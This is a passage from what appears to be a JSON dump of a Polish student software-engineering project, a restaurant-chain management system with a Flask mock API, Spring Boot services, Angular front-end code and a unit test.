int(rrequest['id_zamowienia'])\n if rrequest['status'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n status = str(rrequest['status'])\n for zamowienie in lista_zamowien['lista_zamowien']:\n if zamowienie['id_zamowienia'] == id_zamowienia:\n zamowienie['status'] = str(status)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n print(lista_zamowien)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# Pobierz zamówienia -> przekopiuj z realizacji\[email protected]('/pobierz_zamowienia_Z', methods=['GET'])\ndef pobierz_zamowienia_Z():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien)\n\n\n# Czy to ma sens? : Pobierz_zamowienie(id_zamowienia:int) zwraca (id_klienta:int, id_restauracji:int, lista[id_dania:int,nazwa:string],\n# kwota:double,data_zlozenia:string,status:string,ocena:int)\n\[email protected]('/pobierz_zamowienie_Z', methods=['GET'])\ndef pobierz_zamowienie_Z():\n try:\n if request.args.get(\"id_zamowienia\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_zamowienia = int(request.args.get(\"id_zamowienia\"))\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n return jsonify(lista_zamowien['lista_zamowien'][id_zamowienia])\n\n\nlista_pracownikow = {\n 'lista_pracownikow': [\n {\n 'id_pracownika': 'janPan',\n 'id_restauracji': 1,\n 'imie': 'Jan',\n 'nazwisko': 'Nowak',\n 'telefon': '123456789',\n 'stanowisko': 'pracownik kuchni',\n 'haslo': 'soicrupogi'\n },\n {\n 'id_pracownika': 'AAmen',\n 'id_restauracji': 2,\n 'imie': 'Andrzej',\n 'nazwisko': 'Adrianowski',\n 'telefon': '777888999',\n 'stanowisko': 'dostawca',\n 'haslo': '39084utco'\n\n },\n {\n 'id_pracownika': 'KNow',\n 'id_restauracji': 4,\n 'imie': 'Kasia',\n 'nazwisko': 'Nowak',\n 'telefon': '333444555',\n 'stanowisko': 'menadzer restauracji',\n 'haslo': 'kKdPS'\n\n }\n ]\n}\n\n\[email protected]('/dodaj_pracownika', methods=['POST'])\ndef dodaj_pracownika():\n try:\n rrequest = request.get_json()\n if rrequest['id_pracownika'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_pracownika = rrequest['id_pracownika']\n\n if rrequest['id_restauracji'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(rrequest['id_restauracji'])\n\n if rrequest['imie'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n imie = str(rrequest['imie'])\n\n if rrequest['nazwisko'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwisko = str(rrequest['nazwisko'])\n\n if rrequest['telefon'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n telefon = str(rrequest['telefon'])\n\n if rrequest['stanowisko'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n stanowisko = str(rrequest['stanowisko'])\n\n if rrequest['haslo'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n haslo = str(rrequest['haslo'])\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n lista_pracownikow['lista_pracownikow'].append({\n 'id_pracownika': id_pracownika,\n 'id_restauracji': id_restauracji,\n 'imie': imie,\n 'nazwisko': nazwisko,\n 'telefon': telefon,\n 'stanowisko': stanowisko,\n 'haslo': haslo\n })\n\n print(lista_pracownikow)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\[email protected]('/usun_pracownika', methods=['GET'])\ndef usun_pracownika():\n try:\n if request.args.get('id_pracownika') is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_pracownika = request.args.get('id_pracownika')\n k = 0\n for pracownik in lista_pracownikow['lista_pracownikow']:\n if pracownik['id_pracownika'] == id_pracownika:\n lista_pracownikow['lista_pracownikow'].pop(k)\n k += 1\n\n print(lista_pracownikow)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\[email protected]('/pobierz_pracownikow', methods=['GET'])\ndef pobierz_pracownikow():\n try:\n if request.args.get(\"id_restauracji\") is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get(\"id_restauracji\"))\n # nie ma jeszcze rozroznienia na pracownikow ze wzgledu na restauracje, przykro mi :(\n print(lista_pracownikow)\n return jsonify(lista_pracownikow)\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\nlista_restauracji = {\n 'lista_restauracji': [\n {\n 'nazwa': 'Cebuliowo',\n 'id_restauracji': 1,\n 'adres': 'Bitwy 17'\n },\n {\n 'nazwa': 'Pizza House',\n 'id_restauracji': 2,\n 'adres': 'Okopowa 2'\n },\n {\n 'nazwa': 'Students Dream',\n 'id_restauracji': 3,\n 'adres': 'Granadierow 5'\n }\n ]\n}\nrestauracje_iterator = 3\n\n\n# a) Dodaj_restauracje(nazwa:string,adres:string)\[email protected]('/dodaj_restauracje', methods=['POST'])\ndef dodaj_restauracje():\n try:\n rrequest = request.get_json()\n if rrequest['nazwa'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n nazwa = str(rrequest['nazwa'])\n\n if rrequest['adres'] is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n adres = str(rrequest['adres'])\n\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n global restauracje_iterator\n restauracje_iterator += 1\n lista_restauracji['lista_restauracji'].append({\n 'nazwa': nazwa,\n 'id_restauracji': restauracje_iterator,\n 'adres': adres\n })\n print(lista_restauracji)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n\n\n# b) Usuń_restauracje(id_restauracji:int)\[email protected]('/usun_restauracje', methods=['GET'])\ndef usun_restauracje():\n try:\n if request.args.get('id_restauracji') is None:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n id_restauracji = int(request.args.get('id_restauracji'))\n k = 0\n for restauracja in lista_restauracji['lista_restauracji']:\n if restauracja['id_restauracji'] == id_restauracji:\n lista_restauracji['lista_restauracji'].pop(k)\n k += 1\n\n print(lista_restauracji)\n resp = jsonify(success=True)\n resp.status_code = 200\n return resp\n except KeyError:\n resp = jsonify(success=False)\n resp.status_code = 404\n return resp\n\n\n# c) Pobierz_restauracje() zwraca (lista[id_restauracji:int,nazwa:string,adres:string)\[email protected]('/pobierz_restauracje', methods=['GET'])\ndef pobierz_restauracje():\n return jsonify(lista_restauracji)\n\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 43, "blob_id": "67703d7bafb51f04e63e21d18ffe9faf2118ce9a", "content_id": "bd696505a844f684a00487520cdeb8ed3a2f391f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 45, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/settings.gradle", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "rootProject.name = 'zarzadzanie_personelem'\r\n" }, { "alpha_fraction": 0.498463898897171, "alphanum_fraction": 0.5038402676582336, "avg_line_length": 21.672727584838867, "blob_id": "ceef67391eab6beab6d2dbefebdba2194ba84e6a", "content_id": "f110ef543d88947d4fe7824f7d2c900b2de5cbec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1302, "license_type": "no_license", "max_line_length": 84, "num_lines": 55, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Entity/RestaurantForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class RestaurantForm {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(RestaurantForm.class);\r\n \r\n private boolean valid;\r\n\r\n public boolean isValid() {\r\n return valid;\r\n }\r\n\r\n private String nazwa;\r\n private String adres;\r\n\r\n public static Logger getLog() {\r\n return log;\r\n }\r\n\r\n public String getNazwa() {\r\n return nazwa;\r\n }\r\n\r\n public String getAdres() {\r\n return adres;\r\n }\r\n\r\n public void validate(){\r\n \r\n if(!validateName()){\r\n valid = false;\r\n return;\r\n }\r\n valid = true;\r\n }\r\n \r\n private boolean validateName(){\r\n if(nazwa.length() > 30){\r\n log.info(\"String {} has more than 30 signs\", nazwa);\r\n return false; \r\n }\r\n if(!nazwa.matches(\"[\\\\w- ]+\")){\r\n log.info(\"Some signs of {} are illegal\", nazwa);\r\n return false; \r\n }\r\n if(!Character.isUpperCase(nazwa.codePointAt(0))){\r\n log.info(\"First letter of {} is not capitalized\", nazwa);\r\n return false; \r\n } \r\n return true;\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5799372792243958, "alphanum_fraction": 0.5935214161872864, "avg_line_length": 27.90625, "blob_id": "1ee8c3061d19cd4283a8d38e3289327a23cc1e45", "content_id": "d33af2e920e688e425f4d22a2ae012f837215581", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 957, "license_type": "no_license", "max_line_length": 111, "num_lines": 32, "path": "/payment/src/app/services/data.service.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Injectable } from '@angular/core';\r\nimport { Headers, RequestOptions, Response } from '@angular/http';\r\nimport { HttpClient } from '@angular/common/http';\r\nimport { Payment } from '../models/Payment';\r\nimport { Status } from '../models/Status';\r\n\r\n@Injectable()\r\nexport class DataService {\r\n\r\n constructor(public http: HttpClient) { }\r\n\r\n id: string;\r\n\r\n pay(payment: Payment) {\r\n payment.id_klienta = 1;\r\n payment.id_zamowienia = 1;\r\n payment.suma = 30;\r\n return this.http.post('http://localhost:9092/zaplac', payment).subscribe(res => this.processLink(res));\r\n }\r\n\r\n processLink(res) {\r\n window.open(res[\"redirectLink\"], \"_blank\")\r\n this.id = res[\"redirectLink\"].split(\"/\")[3];\r\n console.log(this.id);\r\n }\r\n\r\n \r\n getStatus() {\r\n return this.http.get(`http://localhost:9092/pobierz_status?id=${this.id}`)\r\n .subscribe(res => console.log(res));\r\n } \r\n}\r\n" }, { "alpha_fraction": 0.762135922908783, "alphanum_fraction": 0.8398058414459229, "avg_line_length": 39.20000076293945, "blob_id": "89fe44c89132468479128979800bbe555dd83acf", "content_id": "a68ef0b02f161a0a4ccfc6879e4cf150553e4027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 206, "license_type": "no_license", "max_line_length": 61, "num_lines": 5, "path": "/baza_personel/baza_personel/src/main/resources/application.properties", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "server.port=9091\r\n\r\ncreateEmployeeAddress=http://localhost:5000/dodaj_pracownika\r\ngetEmployeesAddress=http://localhost:5000/pobierz_pracownikow\r\nremoveEmployeeAddress=http://localhost:5000/usun_pracownika\r\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 25.22222137451172, "blob_id": "9eff62354c23e125599b0edb7336f3772ceadefa", "content_id": "a95a548d24be11b6c7a96c96eac2416149168cf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 243, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/ui-menadzera-restauracji/src/app/models/Employee.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Employee {\r\n public imie: string;\r\n public nazwisko: string;\r\n public id_restauracji: number;\r\n public stanowisko: string;\r\n public telefon: number;\r\n public id_pracownika: string;\r\n public haslo: string;\r\n }" }, { "alpha_fraction": 0.5452991724014282, "alphanum_fraction": 0.5547008514404297, "avg_line_length": 38.344825744628906, "blob_id": "f41c988a170353e0128f92bc5c4ea023928968d8", "content_id": "c5494e5e77d49ddbe09ddf82b4d3a3557050a5c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2342, "license_type": "no_license", "max_line_length": 114, "num_lines": 58, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/test/java/zarzadzanie_personelem/Entity/EmployeeOfferCreatorTest.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport org.junit.Test;\r\nimport static org.junit.Assert.*;\r\nimport org.junit.runner.RunWith;import org.mockito.Mockito;\r\nimport org.powermock.api.mockito.PowerMockito;\r\nimport org.powermock.core.classloader.annotations.PrepareForTest;\r\nimport org.powermock.modules.junit4.PowerMockRunner;\r\n\r\n@RunWith(PowerMockRunner.class)\r\n@PrepareForTest(EmployeeOfferCreator.class)\r\npublic class EmployeeOfferCreatorTest {\r\n \r\n String invalidInput = new Gson().toJson(\"Nie udało się!\");\r\n \r\n @Test\r\n public void testCreateEmployeeOfferCorrect() throws Exception{\r\n String result;\r\n String employeeOfferFormJson;\r\n \r\n employeeOfferFormJson = \"{\\n\" +\r\n \" \\\"id_restauracji\\\": \\\"1\\\", \\n\" +\r\n \" \\\"etat\\\": \\\"40\\\",\\n\" +\r\n \" \\\"telefon\\\": \\\"123 123 123\\\",\\n\" +\r\n \" \\\"stanowisko\\\": \\\"Kucharz\\\"\\n\"+\r\n \" } \";\r\n \r\n result =helperValidator(employeeOfferFormJson);\r\n assertNotEquals(result, invalidInput); \r\n } \r\n \r\n @Test\r\n public void testCreateEmployeeOfferIncorrect() throws Exception{\r\n String result;\r\n String employeeOfferFormJson;\r\n \r\n employeeOfferFormJson = \"{\\n\" +\r\n \" \\\"id_restauracji\\\": \\\"1\\\", \\n\" +\r\n \" \\\"etat\\\": \\\"40\\\",\\n\" +\r\n \" \\\"telefon\\\": \\\"123 123\\\",\\n\" +\r\n \" \\\"stanowisko\\\": \\\"Kucharz\\\"\\n\"+\r\n \" } \";\r\n \r\n result =helperValidator(employeeOfferFormJson);\r\n assertEquals(result, invalidInput); \r\n } \r\n \r\n private String helperValidator(String formJson) throws Exception{\r\n EmployeeOfferCreator employeeOfferCreator = new EmployeeOfferCreator();\r\n EmployeeOfferCreator employeeOfferCreatorSpy = PowerMockito.spy(employeeOfferCreator);\r\n \r\n PowerMockito.doReturn(\"Success\").when(employeeOfferCreatorSpy, \"saveEmployeeOfferToCache\", Mockito.any());\r\n String result = employeeOfferCreatorSpy.createEmployeeOffer(formJson, \"\");\r\n return result;\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6709677577018738, "alphanum_fraction": 0.6709677577018738, "avg_line_length": 24.16666603088379, "blob_id": "4f4b5c9521c7797d6448131647efd9891873db1a", "content_id": "e9ce2545ea3b6ccc4e8b4c84195738d9ff017de1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 157, "license_type": "no_license", "max_line_length": 34, "num_lines": 6, "path": "/payment/src/app/Models/Payment.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "export class Payment {\r\n public id_klienta: number;\r\n public id_zamowienia: number;\r\n public sposób_zapłaty: string;\r\n public suma: number; \r\n}" }, { "alpha_fraction": 0.6668869853019714, "alphanum_fraction": 0.6675479412078857, "avg_line_length": 37.298702239990234, "blob_id": "e9853324d1a400a2ad66f200304778940348f47c", "content_id": "fc7348ab5a34ba9d9959caae5c4a06674f3d5f56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3026, "license_type": "no_license", "max_line_length": 124, "num_lines": 77, "path": "/zarzadzanie_siecia/src/main/java/zarzadzanie_siecia/Entity/RestaurantCreator.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage zarzadzanie_siecia.Entity;\r\n\r\nimport com.google.gson.Gson;\r\nimport com.google.gson.reflect.TypeToken;\r\nimport java.util.HashMap;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class RestaurantCreator {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(RestaurantCreator.class);\r\n\r\n public String createRestaurant(final String restaurantFormJson, final String url) {\r\n RestaurantForm restaurantForm = (new Gson()).fromJson(restaurantFormJson, RestaurantForm.class);\r\n restaurantForm.validate();\r\n if(restaurantForm.isValid()){\r\n return saveRestaurantToDB(restaurantForm, url);\r\n }else{\r\n return (new Gson()).toJson(\"Invalid input\");\r\n }\r\n }\r\n \r\n private String saveRestaurantToDB(final RestaurantForm restaurantForm, final String url){\r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.postForObject(url, restaurantForm, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n } \r\n\r\n public String getRestaurant(String url) {\r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.getForObject(url, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser); \r\n }\r\n\r\n public String assignManager(String assignManagerForm, String url) {\r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.postForObject(url, assignManagerForm, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n }\r\n\r\n public String removeRestaurant(String restaurantIdForm, String url) {\r\n String id_restauracji = getId_restauracji(restaurantIdForm);\r\n String urlWithId = url+\"?id_restauracji=\"+id_restauracji;\r\n \r\n RestTemplate restTemplate = new RestTemplate();\r\n String responseDB = restTemplate.getForObject(url, String.class);\r\n \r\n HashMap<String, String> responseUser = new HashMap();\r\n responseUser.put(\"message\", responseDB);\r\n return (new Gson()).toJson(responseUser);\r\n }\r\n \r\n private String getId_restauracji(String json){\r\n HashMap<String, String> jsonMapped = new Gson().fromJson(json, new TypeToken<HashMap<String,String>>(){}.getType());\r\n return jsonMapped.get(\"id_restauracji\");\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.5864315032958984, "alphanum_fraction": 0.5869742035865784, "avg_line_length": 30.04347801208496, "blob_id": "31a004f9d48a25c0d53a233d328caa82ffe7878d", "content_id": "0eda3c2f9191dac7c28657cc6e8d4a6d54493165", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3685, "license_type": "no_license", "max_line_length": 88, "num_lines": 115, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Controller/EmployeeController.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Controller;\r\n\r\nimport zarzadzanie_personelem.Entity.EmployeeCreator;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.beans.factory.annotation.Autowired;\r\nimport org.springframework.core.env.Environment;\r\nimport org.springframework.web.bind.annotation.CrossOrigin;\r\nimport org.springframework.web.bind.annotation.GetMapping;\r\nimport org.springframework.web.bind.annotation.RestController;\r\nimport org.springframework.web.bind.annotation.PostMapping;\r\nimport org.springframework.web.bind.annotation.RequestBody;\r\nimport org.springframework.web.bind.annotation.RequestParam;\r\nimport zarzadzanie_personelem.Entity.EmployeeOfferCreator;\r\n\r\n@RestController\r\npublic class EmployeeController {\r\n \r\n @Autowired\r\n private Environment env;\r\n \r\n private static final Logger log = LoggerFactory.getLogger(EmployeeController.class);\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_pracownika\")\r\n public String addEmployee(\r\n @RequestBody String employeeForm) \r\n {\r\n try{\r\n log.info(\"Adding employee {}\", employeeForm);\r\n return (new EmployeeCreator()).createEmployee(\r\n employeeForm, \r\n env.getProperty(\"createEmployeeAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_pracownikow\")\r\n public String getEmployees() \r\n {\r\n try{\r\n log.info(\"Fetching employees\");\r\n return (new EmployeeCreator()).getEmployees(\r\n env.getProperty(\"getEmployeesAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_pracownikow\")\r\n public String getEmployeesOfRestaurant(\r\n @RequestParam(\"id_restauracji\") String id_restauracji) \r\n {\r\n try{\r\n log.info(\"Fetching employees\");\r\n return (new EmployeeCreator()).getEmployees(\r\n id_restauracji,\r\n env.getProperty(\"getEmployeesAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @GetMapping(\"/usun_pracownika\")\r\n public String removeEmployee(\r\n @RequestParam(\"id_pracownika\") String id_pracownika) \r\n {\r\n try{\r\n log.info(\"Removing employee {}\", id_pracownika);\r\n return (new EmployeeCreator()).removeEmployee(\r\n id_pracownika,\r\n env.getProperty(\"removeEmployeeAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n \r\n @CrossOrigin\r\n @PostMapping(\"/dodaj_ogloszenie\")\r\n public String addOffer(\r\n @RequestBody String employeeOfferForm) \r\n {\r\n try{\r\n log.info(\"Adding employee offer {}\", employeeOfferForm);\r\n return (new EmployeeOfferCreator()).createEmployeeOffer(\r\n employeeOfferForm, \r\n env.getProperty(\"createEmployeeOfferAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n } \r\n \r\n @CrossOrigin\r\n @GetMapping(\"/pobierz_ogloszenia\")\r\n public String getOffers() \r\n {\r\n try{\r\n log.info(\"Fetching employee offers\");\r\n return (new EmployeeOfferCreator()).getEmployeeOffers(\r\n env.getProperty(\"getEmployeeOffersAddress\")\r\n );\r\n }catch(Exception e){\r\n return e.toString();\r\n }\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.6016713380813599, "alphanum_fraction": 0.6016713380813599, "avg_line_length": 19, "blob_id": "b915010b2e4b6b9a44e15708fd60617223dca561", "content_id": "cae779f6298eb37b9e461c57b4b40b03a4074aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 359, "license_type": "no_license", "max_line_length": 65, "num_lines": 17, "path": "/platnosci/platnosci/src/main/java/utils/EasyCache.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "\r\npackage utils;\r\n\r\nimport java.util.HashMap;\r\n\r\npublic class EasyCache {\r\n \r\n private static HashMap<String, String> cache = new HashMap();\r\n \r\n public static void addElement(String key, String value){\r\n cache.put(key, value);\r\n }\r\n \r\n public static String getElement(String key){\r\n return cache.get(key);\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.6360543966293335, "alphanum_fraction": 0.6360543966293335, "avg_line_length": 25.34883689880371, "blob_id": "f153194d357ce05779896b46873e7e84c331c981", "content_id": "8d1220339ec378c5afb19ef7f692e3ed5d3749c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/ui-menadzera-sieci/src/app/components/add-recruitment/add-recruitment.component.ts", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "import { Component, OnInit } from '@angular/core';\r\nimport { Recruitment } from '../../models/Recruitment';\r\nimport { DataService } from '../../services/data.service';\r\n\r\n@Component({\r\n selector: 'app-add-recruitment',\r\n templateUrl: './add-recruitment.component.html',\r\n styleUrls: ['./add-recruitment.component.css']\r\n})\r\nexport class AddRecruitmentComponent implements OnInit {\r\n\r\n recruitment: Recruitment = new Recruitment();\r\n recruitmentNew: Recruitment = new Recruitment();\r\n alertString: string = \"\";\r\n\r\n constructor(public dataService: DataService) {\r\n\r\n }\r\n\r\n ngOnInit() {\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n }\r\n\r\n onSubmit() {\r\n this.dataService.addRecruitment(this.recruitmentNew)\r\n .subscribe(res => {\r\n var getValueArray = Object.values(res)\r\n this.alertString += getValueArray;\r\n alert(this.alertString.split(',').join(\"\"));\r\n this.alertString = \"\";\r\n this.dataService.getRecruitmentsList().subscribe(recruitment => {\r\n this.recruitment = recruitment;\r\n });\r\n });\r\n }\r\n\r\n onCancel() {\r\n\r\n }\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6514124274253845, "alphanum_fraction": 0.6519774198532104, "avg_line_length": 36.064517974853516, "blob_id": "dcf49ee91a0a58776ec6fabf8c675c04e377359e", "content_id": "1fc055f9bdacfe336475fe2e6a8c336f5d269c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3554, "license_type": "no_license", "max_line_length": 108, "num_lines": 93, "path": "/baza_zarzadzanie_siecia/src/main/java/baza_zarzadzanie_siecia/Entity/SQLConnector.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "/*\r\n * To change this license header, choose License Headers in Project Properties.\r\n * To change this template file, choose Tools | Templates\r\n * and open the template in the editor.\r\n */\r\npackage baza_zarzadzanie_siecia.Entity;\r\n\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\nimport org.springframework.http.HttpEntity;\r\nimport org.springframework.http.HttpHeaders;\r\nimport org.springframework.http.HttpMethod;\r\nimport org.springframework.http.HttpStatus;\r\nimport org.springframework.http.MediaType;\r\nimport org.springframework.http.ResponseEntity;\r\nimport org.springframework.web.client.RestTemplate;\r\n\r\n/**\r\n *\r\n * @author adas\r\n */\r\npublic class SQLConnector implements Connector {\r\n \r\n private static final Logger log = LoggerFactory.getLogger(SQLConnector.class);\r\n\r\n @Override\r\n public String createRestaurant(final String restaurantFormJson, final String url){ \r\n \r\n log.info(\"Sending {} to {}\", restaurantFormJson, url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<String>(restaurantFormJson, headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n @Override\r\n public String getRestaurant(String url) {\r\n log.info(\"Sending to {}\", url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return response.getBody();\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n @Override\r\n public String assignManager(String assignManagerForm, String url) {\r\n log.info(\"Sending {} to {}\", assignManagerForm, url);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(assignManagerForm, headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.POST, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n\r\n @Override\r\n public String removeRestaurant(String restaurantId, String url) {\r\n String urlWithId = url+\"?id_restauracji=\"+restaurantId;\r\n \r\n log.info(\"Sending to {}\", urlWithId);\r\n RestTemplate restTemplate = new RestTemplate();\r\n HttpHeaders headers = new HttpHeaders();\r\n headers.setContentType(MediaType.APPLICATION_JSON);\r\n\r\n HttpEntity<String> entity = new HttpEntity<>(headers);\r\n ResponseEntity<String> response = restTemplate.exchange(url, HttpMethod.GET, entity, String.class);\r\n if(response.getStatusCode() == HttpStatus.OK){\r\n return \"Udało się!\";\r\n }else{\r\n return \"Nie udało się!\"; \r\n }\r\n }\r\n \r\n}\r\n" }, { "alpha_fraction": 0.49904075264930725, "alphanum_fraction": 0.5067146420478821, "avg_line_length": 27.5744686126709, "blob_id": "cd071101aec6d5de9694b3d9f76248a32058d95c", "content_id": "7ccf75ffeea4337bc3f71f7fe5671bf2974819b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 94, "num_lines": 141, "path": "/zarzadzanie_personelem/zarzadzanie_personelem/src/main/java/zarzadzanie_personelem/Entity/EmployeeForm.java", "repo_name": "Kadek/ProjektowanieOprogramowania", "src_encoding": "UTF-8", "text": "package zarzadzanie_personelem.Entity;\r\n\r\nimport java.util.function.IntConsumer;\r\nimport org.slf4j.Logger;\r\nimport org.slf4j.LoggerFactory;\r\n\r\npublic class 